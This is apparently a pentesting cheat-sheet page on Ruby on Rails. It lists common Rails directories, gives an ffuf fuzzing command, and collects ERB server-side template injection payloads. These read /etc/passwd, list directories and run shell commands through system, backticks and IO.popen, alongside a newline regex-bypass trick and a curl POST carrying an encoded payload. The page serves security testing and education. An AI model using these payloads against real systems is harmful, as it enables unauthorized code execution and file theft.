Ruby on Rails Pentesting
Last modified: 2023-08-10
Ruby on Rails is a web application framework written in Ruby.
Common Directories
/assets/application.css
/config
/Gemfile
/Gemfile.lock
/rails/info
/rails/info/properties
/rails/info/routes
In addition, it’s worth to fuzz under /rails/
directory as below.
ffuf -u https://example.com/rails/FUZZ -w wordlist.txt
ERB Template Injection
If target website uses ERB template which affects a page, we can inject malicious template.
text = "<%= 2*3 %>"
result = ERB.new(text).result(binding)
puts result
# expected result: 6
Payloads
Reference: Server Side Template Injection
<%= 2*3 %>
<%= self.methods %>
<%= self.method(:handle_POST).parameters %>
<!-- List files and directories -->
<%= Dir.entries('/') %>
<%= File.open('/etc/passwd').read %>
<!-- Code Execution -->
<%= system('cat /etc/passwd') %>
<%= `ls -la /` %>
<%= IO.popen('ls /').readlines() %>
Regex Check Bypass
Reference: https://davidhamann.de/2022/05/14/bypassing-regular-expression-checks/
abc\n<%- 2*3 %>
We can also use curl
command if we want to manipulate a payload which contains newline.
Below is an example for using the URL encoded payload <%= IO.popen('ls /').readlines() %>
.
curl https://example.com/ -X POST -d 'abc
%3C%25%3D%20IO%2Epopen%28%27ls%20%2F%27%29%2Ereadlines%28%29%20%25%3E'